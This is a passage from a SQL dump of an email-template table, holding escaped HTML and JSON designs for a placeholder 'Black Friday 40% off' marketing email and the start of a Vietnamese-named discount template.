<tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 120%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><span style=\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 16.8px;\\\">WWW.COMPANYNAME.COM<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 30px;background-color: #f0f0f0\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 30px;background-color: #f0f0f0;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <div style=\\\"font-family: arial, helvetica, sans-serif;\\\"><span style=\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\">You received this email because you signed up for My Company Inc<\\/span><span style=\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\">.<\\/span><\\/div>\\r\\n<div style=\\\"font-family: arial, helvetica, sans-serif;\\\">&nbsp;<\\/div>\\r\\n<div style=\\\"font-family: arial, helvetica, sans-serif;\\\"><span style=\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\">Unsubscribe<\\/span><\\/div>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":4,\\\"u_column\\\":4,\\\"u_content_text\\\":6,\\\"u_content_image\\\":2,\\\"u_content_divider\\\":2},\\\"body\\\":{\\\"id\\\":\\\"N577VjiZui\\\",\\\"rows\\\":[{\\\"id\\\":\\\"klUcYuOt24\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"eZ3EFEHf-s\\\",\\\"contents\\\":[{\\\"id\\\":\\\"B1mS6vIkz8\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"18px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502399458599-adada_36.png\\\",\\\"width\\\":146,\\\"height\\\":105,\\\"maxWidth\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"},\\\"url\\\":\\\"\\\",\\\"target\\\":\\\"\\\"},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#242424\\\",\\\"columnsBackgroundColor\\\":\\\"rgba(255,255,255,0)\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"QcupwIJycl\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"zoq74hp3Cy\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ubitoo7JWB\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 20px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"100%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 100%;\\\\\\\"><span style=\\\\\\\"font-family: impact, chicago; font-size: 72px; line-height: 72px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 72px; color: #ffffff; font-size: 72px;\\\\\\\"><span style=\\\\\\\"line-height: 72px; font-size: 72px;\\\\\\\">BLACK<\\/span><\\/span><\\/strong><\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 100%;\\\\\\\"><span style=\\\\\\\"font-family: impact, chicago; font-size: 72px; line-height: 72px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 72px; color: #ffffff; font-size: 72px;\\\\\\\"><span style=\\\\\\\"line-height: 72px; font-size: 72px;\\\\\\\">FRIDAY<\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"dm2GBgmVHg\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"9px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396368642-s2ss_31.png\\\",\\\"width\\\":247,\\\"height\\\":30,\\\"maxWidth\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"},\\\"url\\\":\\\"\\\",\\\"target\\\":\\\"\\\"},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"8wHU-ryi72\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 20px 35px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><span style=\\\\\\\"font-size: 36px; line-height: 43.2px; color: #ffffff; font-family: Lato, sans-serif;\\\\\\\">25<span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">TH<\\/span> NOVEMBER<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#242424\\\",\\\"columnsBackgroundColor\\\":\\\"#e01223\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396106191-asadaa_02.jpg\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":true,\\\"center\\\":true,\\\"cover\\\":false,\\\"width\\\":596,\\\"height\\\":841},\\\"padding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"ZWV2XyDxD0\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"i2u9Sw1lHu\\\",\\\"contents\\\":[{\\\"id\\\":\\\"VWYDHstKrf\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"21px 15px 8px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><span style=\\\\\\\"font-family: impact, chicago; font-size: 34px; line-height: 40.8px;\\\\\\\">START FROM<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><span style=\\\\\\\"font-family: impact, chicago; font-size: 48px; line-height: 57.6px;\\\\\\\">40% OFF<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"mRVYaOXNwi\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"33%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#CCC\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"dQkSMjZpeb\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"130%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 130%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 15.6px;\\\\\\\">Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium,<span style=\\\\\\\"color: #e01223; font-size: 12px; line-height: 15.6px;\\\\\\\"><strong> totam rem<\\/strong><\\/span> aperiam, eaque ipsa quae ab illo <span style=\\\\\\\"font-size: 14px; line-height: 18.2px; color: #e01223;\\\\\\\"><strong>inventore<\\/strong> <\\/span>veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia <span style=\\\\\\\"font-size: 14px; line-height: 18.2px; color: #e01223;\\\\\\\"><strong>voluptas sit aspernatur<\\/strong> <\\/span>aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"mdayUcLzJl\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"33%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#CCC\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"zh3KVfCS9k\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><span style=\\\\\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 16.8px;\\\\\\\">WWW.COMPANYNAME.COM<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#242424\\\",\\\"columnsBackgroundColor\\\":\\\"rgba(255,255,255,0)\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396106191-asadaa_02.jpg\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":true,\\\"center\\\":true,\\\"cover\\\":false,\\\"width\\\":596,\\\"height\\\":841},\\\"padding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"s_2Nb3F9V_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2Jd9PHXbuB\\\",\\\"contents\\\":[{\\\"id\\\":\\\"rL-yoq3ExM\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<div style=\\\\\\\"font-family: arial, helvetica, sans-serif;\\\\\\\"><span style=\\\\\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\\\\\">You received this email because you signed up for My Company Inc<\\/span><span style=\\\\\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\\\\\">.<\\/span><\\/div>\\\\n<div style=\\\\\\\"font-family: arial, helvetica, sans-serif;\\\\\\\">&nbsp;<\\/div>\\\\n<div style=\\\\\\\"font-family: arial, helvetica, sans-serif;\\\\\\\"><span style=\\\\\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\\\\\">Unsubscribe<\\/span><\\/div>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f0f0f0\\\",\\\"columnsBackgroundColor\\\":\\\"rgba(255,255,255,0)\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":false,\\\"cover\\\":false},\\\"padding\\\":\\\"30px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"type\\\":\\\"google\\\",\\\"weights\\\":\\\"400,700\\\"},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":true},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":9}\"', '', 1, '2023-03-14 10:00:58');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(14, 'Khuyen mai - 13 Mar-2023 - Discount', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-32 {\\r\\n    width: 192px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-48p17 {\\r\\n    width: 289.02px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-49p83 {\\r\\n    width: 298.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50p17 {\\r\\n    width: 301.02px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-51p83 {\\r\\n    width: 310.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-68 {\\r\\n    width: 408px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\n@media (max-width: 480px) {\\r\\n  .hide-mobile {\\r\\n    max-height: 0px;\\r\\n    overflow: hidden;\\r\\n    display: none !important;\\r\\n  }\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #0000ee; text-decoration: underline; } @media (max-width: 480px) { #u_content_text_1 .v-text-align { text-align: center !important; } #u_content_text_2 .v-text-align { text-align: center !important; } #u_content_text_5 .v-text-align { text-align: center !important; } #u_content_button_1 .v-text-align { text-align: center !important; } #u_content_menu_1 .v-layout-display { display: block !important; } #u_content_menu_1 .v-padding { padding: 8px 8px 5px !important; } #u_content_text_4 .v-text-align { text-align: center !important; } #u_content_text_deprecated_8 .v-text-align { text-align: center !important; } #u_content_text_deprecated_1 .v-text-align { text-align: center !important; } #u_content_text_13 .v-text-align { text-align: center !important; } #u_content_text_deprecated_5 .v-text-align { text-align: center !important; } #u_content_button_3 .v-text-align { text-align: center !important; } #u_content_text_9 .v-text-align { text-align: center !important; } #u_content_text_10 .v-text-align { text-align: center !important; } #u_content_text_11 .v-text-align { text-align: center !important; } #u_content_button_2 .v-text-align { text-align: center !important; } #u_content_text_deprecated_9 .v-text-align { text-align: center !important; } #u_content_text_deprecated_10 .v-text-align { text-align: center !important; } #u_content_text_deprecated_11 .v-text-align { text-align: center !important; } #u_content_button_11 .v-text-align { text-align: center !important; } #u_content_text_deprecated_12 .v-text-align { text-align: center !important; } #u_content_text_deprecated_13 .v-text-align { text-align: center !important; } 